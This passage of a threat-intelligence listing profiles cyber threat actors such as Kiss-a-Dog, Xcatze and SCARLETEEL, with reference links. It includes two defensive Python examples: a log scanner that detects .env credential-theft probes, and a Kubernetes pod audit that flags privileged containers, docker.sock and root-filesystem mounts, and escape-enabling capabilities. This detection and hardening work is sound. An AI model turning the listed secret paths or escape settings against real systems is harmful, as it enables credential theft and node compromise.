CrowdStrike identified a cryptojacking campaign, dubbed Kiss-a-dog, that targets vulnerable Docker and Kubernetes infrastructure. The campaign retrieves its payload from an obscure domain, attempts to escape the container onto the host, and mines to anonymized “dog”-themed mining pools.

The tag is: misp-galaxy:threat-actor="Kiss-a-Dog"

Table 12238. Table References

Links

https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/

DEV-1028

Microsoft reported on MCCrash, an IoT botnet operated by the DEV-1028 threat actor and used to launch DDoS attacks against private Minecraft servers.

The tag is: misp-galaxy:threat-actor="DEV-1028"

Table 12239. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/12/15/mccrash-cross-platform-ddos-botnet-targets-private-minecraft-servers/

TwoSail Junk

TwoSail Junk directs visitors to its exploit site by posting links within the threads of forum discussions, or by creating new topic threads of its own. To date, dozens of visits were recorded from within Hong Kong, with a couple from Macau. The technical details around the functionality of the iOS implant, called LightSpy, and the related infrastructure reveal a low-to-mid capability actor. However, the iOS implant is a modular and exhaustively functional iOS surveillance framework.

The tag is: misp-galaxy:threat-actor="TwoSail Junk"

TwoSail Junk is also known as:

  • Operation Poisoned News

Table 12240. Table References

Links

https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/

https://securelist.com/apt-annual-review-what-the-worlds-threat-actors-got-up-to-in-2020/99574/

https://www.redpacketsecurity.com/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/?utm_source=rss&utm_medium=rss&utm_campaign=operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links

Xcatze

Cloud security company Lacework says it discovered a threat actor group named Xcatze that uses Python-based malware named AndroxGh0st to take over AWS servers and send out massive email spam campaigns. Lacework says the malware operates by scanning web apps written in the Laravel PHP framework for exposed configuration files (Laravel’s .env file) in order to identify and steal server credentials. Researchers said AndroxGh0st specifically searches for AWS, SendGrid, and Twilio credentials, which it uses to take control of email servers and accounts and send out the spam campaigns.

The tag is: misp-galaxy:threat-actor="Xcatze"

Table 12241. Table References

Links

https://www.lacework.com/blog/androxghost-the-python-malware-exploiting-your-aws-keys/
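
As an added illustration (this is example code written for this page, not Lacework’s tooling or the AndroxGh0st malware itself), the following Python script shows the server-side view of the scanning described above: it parses web-server access logs in combined format for requests to .env-style paths, flags any that returned 200 as a probable configuration leak, and lists which credential variables a leaked file would have handed over. The log lines and the .env body are constructed samples, and the path pattern and variable names (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, SENDGRID_API_KEY, TWILIO_AUTH_TOKEN, MAIL_PASSWORD) are assumed conventions rather than anything taken from the Lacework report.

```python
import re

# Constructed access log in Apache/nginx "combined" format; not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Nov/2023:08:14:01 +0000] "GET /.env HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.10 - - [10/Nov/2023:08:14:02 +0000] "GET /admin/.env HTTP/1.1" 404 153 "-" "python-requests/2.31"
203.0.113.10 - - [10/Nov/2023:08:14:03 +0000] "GET /laravel/.env HTTP/1.1" 404 153 "-" "python-requests/2.31"
198.51.100.7 - - [10/Nov/2023:08:15:10 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Nov/2023:08:15:12 +0000] "GET /css/app.css HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
192.0.2.55 - - [10/Nov/2023:08:16:40 +0000] "GET /.env.backup?x=1 HTTP/1.1" 403 199 "-" "curl/8.4.0"
"""

# Constructed .env body standing in for what the 200 response above would have returned.
SAMPLE_ENV = """\
APP_ENV=production
APP_KEY=base64:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
# AWS keys used by the storage driver
AWS_ACCESS_KEY_ID=AKIAEXAMPLEEXAMPLE01
AWS_SECRET_ACCESS_KEY=exampleSecretKeyNotReal
SENDGRID_API_KEY=
MAIL_PASSWORD="hunter2"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Any path component named .env, with or without a suffix such as .bak or .backup (assumed pattern).
ENV_PATH_RE = re.compile(r'(^|/)\.env(\.[A-Za-z0-9_-]+)?$')
# Variable names the text says the malware harvests, in their usual Laravel/SDK spelling (assumed).
SECRET_KEYS = ('AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY', 'SENDGRID_API_KEY',
               'TWILIO_AUTH_TOKEN', 'MAIL_PASSWORD')


def parse_line(line):
    """Parse one combined-format log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    rec['path'] = rec['path'].split('?', 1)[0]   # drop the query string before matching
    return rec


def find_env_probes(log_text):
    """Return (ip, path, status) for every request aimed at a .env-style file."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and ENV_PATH_RE.search(rec['path']):
            hits.append((rec['ip'], rec['path'], rec['status']))
    return hits


def summarize(hits):
    """Group probes per source IP; a 200 means the file body was actually served."""
    per_ip = {}
    for ip, path, status in hits:
        entry = per_ip.setdefault(ip, {'probes': 0, 'leaked_paths': []})
        entry['probes'] += 1
        if status == 200:
            entry['leaked_paths'].append(path)
    return per_ip


def exposed_secrets(env_text):
    """List credential variables in a leaked .env that carry a non-empty value; these must be rotated."""
    found = []
    for raw in env_text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#') or '=' not in line:
            continue
        key, value = line.split('=', 1)
        if key.strip() in SECRET_KEYS and value.strip().strip('"\''):
            found.append(key.strip())
    return found


if __name__ == '__main__':
    report = summarize(find_env_probes(SAMPLE_LOG))
    for ip, info in report.items():
        print(f"{ip}: {info['probes']} probe(s), leaked: {info['leaked_paths'] or 'none'}")
    print('rotate:', exposed_secrets(SAMPLE_ENV))
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents. A 200 on any of these paths means the keys in that file have already left the server, so the response is to rotate them (and the APP_KEY), not merely to block the path.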

BlueBottle

Bluebottle, a cyber-crime group that specializes in targeted attacks against the financial sector, is continuing to mount attacks on banks in Francophone countries. The group makes extensive use of living off the land, dual-use tools, and commodity malware, with no custom malware deployed in this campaign.

The tag is: misp-galaxy:threat-actor="BlueBottle"

Table 12242. Table References

Links

http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa

Dalbit

Dalbit typically targets vulnerable servers, either to steal internal company data or to encrypt files and demand payment. Its targets are usually Windows servers that are poorly managed or not patched to the latest version; there are also cases in which it attacked email servers or MS-SQL database servers.

The tag is: misp-galaxy:threat-actor="Dalbit"

Table 12243. Table References

Links

https://asec.ahnlab.com/en/56941/

https://asec.ahnlab.com/en/56236/

https://asec.ahnlab.com/en/47455/

https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/

SingularityMD

SingularityMD is a threat actor group that has targeted educational institutions in the US. They gained unauthorized access to their networks by exploiting weak security practices, such as using students' dates of birth as passwords. SingularityMD demanded a ransom in cryptocurrency and threatened to leak stolen information if not paid. They have demonstrated a willingness to follow through on their threats and have already leaked some data.

The tag is: misp-galaxy:threat-actor="SingularityMD"

Table 12244. Table References

Links

https://www.databreaches.net/jeffco-public-schools-hit-by-the-same-threat-actors-that-hit-clark-county-school-district-and-via-the-same-way/

https://research.checkpoint.com/2023/30th-october-threat-intelligence-report/

https://www.databreaches.net/hackers-escalate-leak-200k-ccsd-students-data-claim-to-still-have-access-to-ccsd-email-system/

SCARLETEEL

SCARLETEEL is a threat actor that primarily targets cloud environments, specifically AWS and Kubernetes. They have been observed stealing proprietary data and intellectual property, as well as conducting cryptomining operations. SCARLETEEL employs sophisticated tactics and tools to bypass security measures and gain unauthorized access to accounts, often exploiting vulnerabilities in containerized workloads and misconfigurations in AWS policies.

The tag is: misp-galaxy:threat-actor="SCARLETEEL"

Table 12245. Table References

Links

https://sysdig.com/blog/scarleteel-2-0/

https://sysdig.com/blog/cloud-breach-terraform-data-theft/
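
The container-escape attempts mentioned for Kiss-a-Dog above and the containerized-workload misconfigurations mentioned for SCARLETEEL both depend on pods that are allowed far more than they need. The following Python audit, written as an added example for this page (not CrowdStrike’s or Sysdig’s tooling), walks a Kubernetes Pod manifest and reports the settings that turn a compromised container into a node compromise: privileged mode, host namespaces, hostPath mounts of the root filesystem or the container runtime socket, added capabilities, running as root, and an auto-mounted service account token. The two manifests are constructed for the example, and the severity labels and the list of sensitive host paths are this example’s own choices, not drawn from either report.

```python
import json

# Constructed Pod manifests for this example (JSON, so no YAML dependency is needed).
RISKY_POD = json.loads("""
{
  "apiVersion": "v1", "kind": "Pod",
  "metadata": {"name": "miner-host", "namespace": "default"},
  "spec": {
    "hostPID": true,
    "hostNetwork": true,
    "volumes": [
      {"name": "rootfs", "hostPath": {"path": "/"}},
      {"name": "dock",   "hostPath": {"path": "/var/run/docker.sock"}}
    ],
    "containers": [{
      "name": "worker", "image": "alpine:3.18",
      "securityContext": {
        "privileged": true,
        "runAsUser": 0,
        "capabilities": {"add": ["SYS_ADMIN"]}
      },
      "volumeMounts": [{"name": "rootfs", "mountPath": "/host"}]
    }]
  }
}
""")

HARDENED_POD = json.loads("""
{
  "apiVersion": "v1", "kind": "Pod",
  "metadata": {"name": "web", "namespace": "prod"},
  "spec": {
    "automountServiceAccountToken": false,
    "volumes": [{"name": "tmp", "emptyDir": {}}],
    "containers": [{
      "name": "app", "image": "nginxinc/nginx-unprivileged:1.25",
      "securityContext": {
        "runAsNonRoot": true,
        "allowPrivilegeEscalation": false,
        "readOnlyRootFilesystem": true,
        "capabilities": {"drop": ["ALL"]}
      },
      "volumeMounts": [{"name": "tmp", "mountPath": "/tmp"}]
    }]
  }
}
""")

# Host paths whose mount lets a container read or control the node; assumed list for this example.
SENSITIVE_HOST_PATHS = {
    '/', '/etc', '/proc', '/root', '/var/lib/kubelet',
    '/var/run/docker.sock', '/run/containerd/containerd.sock',
}
# Capabilities that commonly enable escape or node tampering; assumed list.
ESCAPE_CAPS = {'SYS_ADMIN', 'SYS_PTRACE', 'SYS_MODULE', 'DAC_READ_SEARCH', 'NET_ADMIN'}


def audit_pod(pod):
    """Return a list of (severity, message) findings for one Pod manifest."""
    findings = []
    spec = pod.get('spec', {})
    name = pod.get('metadata', {}).get('name', '<unnamed>')

    # Sharing a host namespace exposes node processes, network or IPC to the container.
    for flag in ('hostPID', 'hostNetwork', 'hostIPC'):
        if spec.get(flag):
            findings.append(('HIGH', f'{name}: {flag}=true shares the node namespace'))

    # The service account token is mounted by default; a stolen one is an API credential.
    if spec.get('automountServiceAccountToken', True):
        findings.append(('MEDIUM', f'{name}: service account token auto-mounted'))

    for vol in spec.get('volumes', []):
        path = vol.get('hostPath', {}).get('path')
        if path is None:
            continue
        norm = path if path == '/' else path.rstrip('/')
        sev = 'HIGH' if norm in SENSITIVE_HOST_PATHS else 'MEDIUM'
        findings.append((sev, f'{name}: hostPath {path} mounted from the node'))

    # Pod-level securityContext is ignored here for brevity; a real audit merges both levels.
    for c in spec.get('containers', []) + spec.get('initContainers', []):
        sc = c.get('securityContext', {})
        cname = f"{name}/{c.get('name', '?')}"
        if sc.get('privileged'):
            findings.append(('CRITICAL', f'{cname}: privileged container, node escape is trivial'))
        elif sc.get('allowPrivilegeEscalation', True):
            findings.append(('MEDIUM', f'{cname}: allowPrivilegeEscalation not set to false'))
        for cap in sorted(set(sc.get('capabilities', {}).get('add', [])) & ESCAPE_CAPS):
            findings.append(('HIGH', f'{cname}: adds CAP_{cap}'))
        if sc.get('runAsUser') == 0 or (sc.get('runAsNonRoot') is not True and 'runAsUser' not in sc):
            findings.append(('MEDIUM', f'{cname}: may run as root'))
    return findings


def worst_severity(findings):
    """Collapse a findings list to the single highest severity present."""
    for level in ('CRITICAL', 'HIGH', 'MEDIUM'):
        if any(sev == level for sev, _ in findings):
            return level
    return 'NONE'


if __name__ == '__main__':
    for pod in (RISKY_POD, HARDENED_POD):
        found = audit_pod(pod)
        print(pod['metadata']['name'], worst_severity(found))
        for sev, msg in found:
            print(f'  [{sev}] {msg}')
```

Feed it the output of `kubectl get pod <name> -o json` to audit a live workload; a CRITICAL or HIGH result on a pod that also holds cloud credentials (instance profile, mounted secrets) is exactly the combination that lets a cryptojacking foothold become account-wide data theft.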

DiceyF

DiceyF is an advanced persistent threat group that has been targeting online casinos and other victims in Southeast Asia for an extended period. They have exhibited overlapping activity with LuckyStar PlugX and Earth Berberoka/GamblingPuppet, as reported by various cybersecurity vendors. While their motivations remain unclear, previous incidents suggest a combination of espionage and intellectual property theft rather than immediate financial gain. DiceyF continuously evolves their codebase and adds encryption capabilities to enhance their stealthy cyberespionage activities.

The tag is: misp-galaxy:threat-actor="DiceyF"

Table 12246. Table References

Links

https://securelist.com/diceyf-deploys-gameplayerframework-in-online-casino-development-studio/107723/

DEV-0950

Lace Tempest, also known as DEV-0950, is a threat actor that exploited vulnerabilities in software such as SysAid and PaperCut to gain unauthorized access to systems. Lace Tempest is known for deploying the Clop ransomware and exfiltrating data from compromised networks.

The tag is: misp-galaxy:threat-actor="DEV-0950"

DEV-0950 is also known as:

  • Lace Tempest

Table 12247. Table References

Links

http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

WeRedEvils

WeRedEvils is a hacking group that has claimed responsibility for multiple cyber attacks. They targeted the Iranian Electric Grid and the Tasnimnews website, causing the latter to go offline. The group also claimed to have hacked into Iran’s oil infrastructure, causing significant damage. They emerged in response to the Hamas massacre and are believed to be a group of Israeli cyber experts.

The tag is: misp-galaxy:threat-actor="WeRedEvils"

Table 12248. Table References

Links

https://cyberwarzone.com/tasnim-news-hacked-by-weredevils/

https://www.msspalert.com/news/managed-security-services-provider-mssp-market-news-30-october-2023

WIRTE

WIRTE is a threat actor group first discovered in 2018. It is suspected to be part of the Gaza Cybergang, an Arabic-speaking, politically motivated group. WIRTE has been observed changing its toolkit and operating methods to remain undetected for longer periods of time. It primarily targets governmental and political entities, but has also been known to target law firms and financial institutions.

The tag is: misp-galaxy:threat-actor="WIRTE"

Table 12249. Table References

Links

https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044/

https://lab52.io/blog/wirte-group-attacking-the-middle-east/

Caracal Kitten

Caracal Kitten is an APT group that has been targeting activists associated with the Kurdistan Democratic Party. They employ a mobile remote access Trojan to gain unauthorized access to victims' devices. The group disguises their malware as legitimate mobile apps, tricking users into installing them and granting the hackers access to their personal data.

The tag is: misp-galaxy:threat-actor="Caracal Kitten"

Caracal Kitten is also known as:

  • APT-Q-58

Table 12250. Table References

Links

https://deform.co/hacker-group-caracal-kitten-targets-kdp-activists-with-malware/

https://www.ctfiot.com/138538.html

Water Labbu

Trend Micro discovered a threat actor they named Water Labbu that was targeting cryptocurrency scam websites. Typically, cryptocurrency scammers use social engineering techniques, interacting with victims to gain their trust and then manipulating them into providing the permissions needed to transfer cryptocurrency assets. While Water Labbu managed to steal cryptocurrencies via a similar method by obtaining access permissions and token allowances from their victim’s wallets, unlike other similar campaigns, they did not use any kind of social engineering — at least not directly. Instead, Water Labbu lets other scammers use their social engineering tricks to scam unsuspecting victims.

The tag is: misp-galaxy:threat-actor="Water Labbu"

Table 12251. Table References

Links

https://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html

TAG-56

TAG-56 is a threat actor group that shares similarities with the APT42 group. They use tactics such as fake registration pages and spearphishing to target victims, often using encrypted chat platforms like WhatsApp or Telegram. TAG-56 is believed to be part of a broader campaign led by an Iran-nexus threat activity group. They have been observed using shared web hosts and recycled code, indicating a preference for acquiring purpose-built infrastructure rather than establishing their own.

The tag is: misp-galaxy:threat-actor="TAG-56"

Table 12252. Table References

Links

https://socradar.io/dark-web-profile-apt42-iranian-cyber-espionage-group/

https://www.recordedfuture.com/suspected-iran-nexus-tag-56-uses-uae-forum-lure-for-credential-theft-against-us-think-tank

TA482

Since early 2022, Proofpoint researchers have observed a prolific threat actor, tracked as TA482, regularly engaging in credential harvesting campaigns that target the social media accounts of mostly US-based journalists and media organizations. This victimology, TA482’s use of services originating from Turkey to host its domains and infrastructure, as well as Turkey’s history of leveraging social media to spread pro-President Recep Tayyip Erdogan and pro-Justice and Development Party (Turkey’s ruling party) propaganda support Proofpoint’s assessment that TA482 is aligned with the Turkish state.

The tag is: misp-galaxy:threat-actor="TA482"

Table 12253. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/above-fold-and-your-inbox-tracing-state-aligned-activity-targeting-journalists

XakNet

XakNet is a self-proclaimed hacktivist group that has targeted Ukraine. They claim to be comprised of Russian patriotic volunteers and have conducted various threat activities, including DDoS attacks, compromises, data leaks, and website defacements. They coordinate their operations with other hacktivist groups and have connections to APT28, a cyber espionage group sponsored by the GRU.

The tag is: misp-galaxy:threat-actor="XakNet"

XakNet is also known as:

  • UAC-0100

  • UAC-0106

Table 12254. Table References

Links

https://www.mandiant.com/resources/blog/gru-rise-telegram-minions

https://www.mandiant.com/resources/blog/gru-disruptive-playbook

https://cip.gov.ua/services/cm/api/attachment/download?id=60068

Zarya

Zarya is a pro-Russian hacktivist group that emerged in March 2022. Initially operating as a special forces unit under the command of Killnet, Zarya has since become an independent entity. The group is primarily known for engaging in Denial-of-Service attacks, website defacement campaigns, and data leaks. Zarya targets government agencies, service providers, critical infrastructure, and civil service employees, both domestically and internationally.

The tag is: misp-galaxy:threat-actor="Zarya"

Zarya is also known as:

  • UAC-0109

Table 12255. Table References

Links

https://www.mandiant.com/resources/blog/killnet-new-capabilities-older-tactics

https://www.cyfirma.com/?post_type=out-of-band&p=17397

https://www.reversinglabs.com/blog/the-week-in-security-possible-colonial-pipeline-2.0-ransomware-hurts-small-american-eateries

https://channellife.com.au/story/the-increasing-presence-of-pro-russia-hacktivists

https://socradar.io/dark-web-profile-killnet-russian-hacktivist-group/

https://cip.gov.ua/services/cm/api/attachment/download?id=60068

DarkCasino

DarkCasino is an economically motivated APT group that targets online trading platforms, including cryptocurrencies, online casinos, network banks, and online credit platforms. They are skilled at stealing passwords to access victims' online accounts and have been active for over a year. DarkCasino exploits vulnerabilities, such as the WinRAR vulnerability CVE-2023-38831, to launch phishing attacks and steal online property.

The tag is: misp-galaxy:threat-actor="DarkCasino"

Table 12256. Table References

Links

https://nsfocusglobal.com/the-new-apt-group-darkcasino-and-the-global-surge-in-winrar-0-day-exploits/

Prolific Puma

Prolific Puma provides an underground link-shortening service to criminals. Infoblox states that during its analysis no legitimate content was observed being served through the shortener. The operators use a registered domain generation algorithm (RDGA), through which they have registered between 35,000 and 75,000 domain names.

The tag is: misp-galaxy:threat-actor="Prolific Puma"

Table 12257. Table References

Links

https://blogs.infoblox.com/cyber-threat-intelligence/prolific-puma-shadowy-link-shortening-service-enables-cybercrime/

Bohrium

Bohrium is an Iranian threat actor that has been involved in spear-phishing operations targeting organizations in the US, Middle East, and India. They often create fake social media profiles, particularly posing as recruiters, to trick victims into running malware on their computers. Microsoft’s Digital Crimes Unit has taken legal action and seized 41 domains used by Bohrium to disrupt their activities. The group has shown a particular interest in sectors such as technology, transportation, government, and education.

The tag is: misp-galaxy:threat-actor="Bohrium"

Bohrium is also known as:

  • Smoke Sandstorm

  • BOHRIUM

Table 12258. Table References

Links

https://twitter.com/CyberAmyHB/status/1532398956918890500

KAX17

KAX17 is a sophisticated threat actor that has been active since at least 2017. They have operated hundreds of malicious servers within the Tor network, primarily as entry and middle points. Their main objective appears to be collecting information on Tor users and mapping their routes within the network. Despite efforts to remove their servers, KAX17 has shown resilience and continues to operate.

The tag is: misp-galaxy:threat-actor="KAX17"

Table 12259. Table References

Links

https://www.malwarebytes.com/blog/news/2021/12/was-threat-actor-kax17-de-anonymizing-the-tor-network/amp

https://therecord.media/a-mysterious-threat-actor-is-running-hundreds-of-malicious-tor-relays

https://darknetlive.com/post/who-is-responsible-for-running-hundreds-of-malicious-tor-relays/

https://nusenu.medium.com/is-kax17-performing-de-anonymization-attacks-against-tor-users-42e566defce8

MirrorFace

MirrorFace is a Chinese-speaking advanced persistent threat group that has been targeting high-value organizations in Japan, including media, government, diplomatic, and political entities. They have been conducting spear-phishing campaigns, utilizing malware such as LODEINFO and MirrorStealer to steal credentials and exfiltrate sensitive data. While there is speculation about a connection to APT10, ESET currently tracks MirrorFace as a separate entity.

The tag is: misp-galaxy:threat-actor="MirrorFace"

Table 12260. Table References

Links

https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/

https://web-assets.esetstatic.com/wls/2023/01/eset_apt_activity_report_t32022.pdf

https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/

VulzSecTeam

VulzSec, also known as VulzSecTeam, is a hacktivist group that has been involved in various cyber-attacks. They have targeted government websites in retaliation for issues such as police brutality and the treatment of Indian Muslims. The group has been involved in campaigns like OpIndia2.0, where they planned to launch DDoS attacks on Indian government websites.

The tag is: misp-galaxy:threat-actor="VulzSecTeam"

VulzSecTeam is also known as:

  • VulzSec

Table 12261. Table References

Links

https://blog.cyble.com/2023/04/28/indian-ideology-targeted-by-hacktivists-reprisal-hacktivism-draws-more-attacks/

https://www.enigmasoftware.com/indonesian-sudanese-cyber-threats-continue-grow-size-scope/

Chernovite

Chernovite is a highly capable and sophisticated threat actor group that has developed a modular ICS malware framework called PIPEDREAM. They are known for targeting industrial control systems and operational technology environments, with the ability to disrupt, degrade, and potentially destroy physical processes. Chernovite has demonstrated a deep understanding of ICS protocols and intrusion techniques, making them a significant threat to critical infrastructure sectors.

The tag is: misp-galaxy:threat-actor="Chernovite"

Table 12262. Table References

Links

https://www.dragos.com/blog/pipedream-mousehole-opcua-module/

https://www.dragos.com/blog/industry-news/chernovite-pipedream-malware-targeting-industrial-control-systems/

https://www.dragos.com/threats/the-2022-ics-ot-vulnerability-briefing-recap/

https://www.dragos.com/blog/responding-to-chernovites-pipedream-with-dragos-global-services/

MurenShark

MurenShark is an advanced persistent threat group that operates primarily in the Middle East, with a focus on Turkey. It has shown interest in military projects, as well as research institutes and universities. The group is highly skilled at resisting analysis and attribution, using sophisticated tactics to avoid detection. It uses compromised websites as file servers and command-and-control servers, and has been known to use attack tools such as NiceRender for phishing.

The tag is: misp-galaxy:threat-actor="MurenShark"

MurenShark is also known as:

  • Actor210426

Table 12263. Table References

Links

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-murenshark-apt-threat-actors-aka-actor210426-active-iocs

DriftingCloud

DriftingCloud is a persistent threat actor known for targeting various industries and locations. They are skilled at developing or acquiring zero-day exploits to gain unauthorized access to target networks. Compromising gateway devices is a common tactic used by DriftingCloud, making network monitoring solutions crucial for detecting their attacks.

The tag is: misp-galaxy:threat-actor="DriftingCloud"

Table 12264. Table References

Links

https://socradar.io/driftingcloud-apt-group-exploits-zero-day-in-sophos-firewall/

https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/

https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html

UNC4191

UNC4191 is a China-linked threat actor that has been involved in cyber espionage campaigns targeting public and private sectors primarily in Southeast Asia. They have been known to use USB devices as an initial infection vector and have been observed deploying various malware families on infected systems. UNC4191’s operations have also extended to the US, Europe, and the Asia Pacific Japan region, with a particular focus on the Philippines.

The tag is: misp-galaxy:threat-actor="UNC4191"

Table 12265. Table References

Links

https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia

https://therecord.media/espionage-group-using-usb-devices-to-hack-targets-in-southeast-asia/

DragonSpark

DragonSpark is a threat actor that has been conducting attacks primarily targeting organizations in East Asia. They utilize the open-source tool SparkRAT, which is a multi-platform and frequently updated remote access Trojan. The threat actor is believed to be Chinese-speaking based on their use of Chinese language support and compromised infrastructure located in China and Taiwan. They employ various techniques to evade detection, including Golang source code interpretation and the use of the China Chopper webshell.

The tag is: misp-galaxy:threat-actor="DragonSpark"

Table 12266. Table References

Links

https://www.sentinelone.com/labs/dragonspark-attacks-evade-detection-with-sparkrat-and-golang-source-code-interpretation/

FusionCore

The CYFIRMA research team has identified a new up-and-coming European threat actor group known as FusionCore. Running Malware-as-a-Service, along with a hacker-for-hire operation, they offer a wide variety of tools and services on their website, making it a one-stop shop for threat actors looking to purchase cost-effective yet customizable malware. The operators have started a ransomware affiliate program that equips attackers with the ransomware and affiliate software to manage victims. FusionCore typically provides buyers with a detailed set of instructions for any service or product being sold, enabling individuals with minimal experience to carry out complex attacks.

The tag is: misp-galaxy:threat-actor="FusionCore"

Table 12267. Table References

Links

https://www.cyfirma.com/?post_type=out-of-band&p=17003

Earth Kitsune

Earth Kitsune is an advanced persistent threat actor that has been active since at least 2019. They primarily target individuals interested in North Korea and use various tactics, such as compromising websites and employing social engineering, to distribute self-developed backdoors. Earth Kitsune demonstrates technical proficiency and continuously evolves their tools, tactics, and procedures. They have been associated with malware such as WhiskerSpy and SLUB.

The tag is: misp-galaxy:threat-actor="Earth Kitsune"

Table 12268. Table References

Links

https://www.trendmicro.com/en_us/research/23/b/earth-kitsune-delivers-new-whiskerspy-backdoor.html

https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html

https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-earth-kitsune-tracking-slub-s-current-operations/

AppMilad

AppMilad is an Iranian hacking group that has been identified as the source of a spyware campaign called RatMilad. This spyware is designed to silently infiltrate victims' devices and gather personal and corporate information, including private communications and photos. The group has been distributing the spyware through fake apps and targeting primarily Middle Eastern enterprises.

The tag is: misp-galaxy:threat-actor="AppMilad"

Table 12269. Table References

Links

https://zimpstage.wpengine.com/blog/we-smell-a-ratmilad-mobile-spyware/

UNC4841

UNC4841 is a well-resourced threat actor that has utilized a wide range of malware and purpose-built tooling to enable their global espionage operations. They have been observed selectively deploying specific malware families at high priority targets, with SKIPJACK being the most widely deployed. UNC4841 primarily targeted government and technology organizations, but they have also been observed targeting other verticals.

The tag is: misp-galaxy:threat-actor="UNC4841"

Table 12270. Table References

Links

https://blog.polyswarm.io/unc4841-targeting-government-entities-with-barracuda-esg-0day-cve-2023-2868

https://www.mandiant.com/resources/blog/unc4841-post-barracuda-zero-day-remediation

https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally

CL-STA-0043

CL-STA-0043 is a highly skilled and sophisticated threat actor, believed to be a nation-state, targeting governmental entities in the Middle East and Africa. They exploit vulnerabilities in on-premises Internet Information Services and Microsoft Exchange servers to infiltrate target networks. They engage in reconnaissance, locate vital assets, and have been observed using native Windows tools for privilege escalation.

The tag is: misp-galaxy:threat-actor="CL-STA-0043"

Table 12271. Table References

Links

https://www.securonix.com/blog/securonix-threat-labs-monthly-intelligence-insights-june-2023/

https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/

DEV-0928

DEV-0928 is a threat actor that has been tracked by Microsoft since September 2022. They are known for their involvement in high-volume phishing campaigns, using tools offered by DEV-1101. DEV-0928 sends phishing emails to targets and has been observed launching campaigns involving millions of emails. They also utilize evasion techniques, such as redirection to benign pages, to avoid detection.

The tag is: misp-galaxy:threat-actor="DEV-0928"

Table 12272. Table References

Links

http://www.microsoft.com/en-us/security/blog/2023/03/13/dev-1101-enables-high-volume-aitm-campaigns-with-open-source-phishing-kit/

TEMP_Heretic

TEMP_Heretic is a threat actor that has been observed engaging in targeted spear-phishing campaigns. They exploit vulnerabilities in email platforms, such as Zimbra, to exfiltrate emails from government, military, and media organizations. They use multiple outlook.com email addresses and manually craft content for each email before sending it.

The tag is: misp-galaxy:threat-actor="TEMP_Heretic"

Table 12273. Table References

Links

https://www.welivesecurity.com/en/eset-research/mass-spreading-campaign-targeting-zimbra-users/

https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/

WeedSec

WeedSec is a threat actor group that recently targeted the online learning and course management platform Moodle, which is widely used by educational institutions and workplaces. They posted sample Moodle databases on their Telegram channel.

The tag is: misp-galaxy:threat-actor="WeedSec"

Table 12274. Table References

Links

https://socradar.io/cyber-awakeness-month-takedown-of-trigona-hive-ransomware-resurges-ransomedforum-and-new-raas-qbit/

TA444

TA444 is a North Korea state-sponsored threat actor that primarily focuses on financially motivated operations. They have been active since at least 2017 and have recently shifted their attention to targeting cryptocurrencies. TA444 employs various infection methods and has a diverse range of malware and backdoors at their disposal. They have been attributed to stealing hundreds of millions of dollars' worth of cryptocurrency and related assets.

The tag is: misp-galaxy:threat-actor="TA444"

Table 12275. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds

https://cyberscoop.com/north-korean-cryptocurrency-hackers-education-government/

https://www.darkreading.com/remote-workforce/north-korea-apt-swindled-1b-crypto-investors-2022

NewsPenguin

NewsPenguin is a threat actor that has been targeting organizations in Pakistan. They use a complex payload delivery mechanism and exploit the upcoming Pakistan International Maritime Expo & Conference as a lure to trick their victims. The group has been linked to a phishing campaign that leverages spear-phishing emails and weaponized documents to deliver an advanced espionage tool.

The tag is: misp-galaxy:threat-actor="NewsPenguin"

Table 12277. Table References

Links

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-newspenguin-threat-actors-targeting-pakistani-entities-with-malicious-campaign-active-iocs

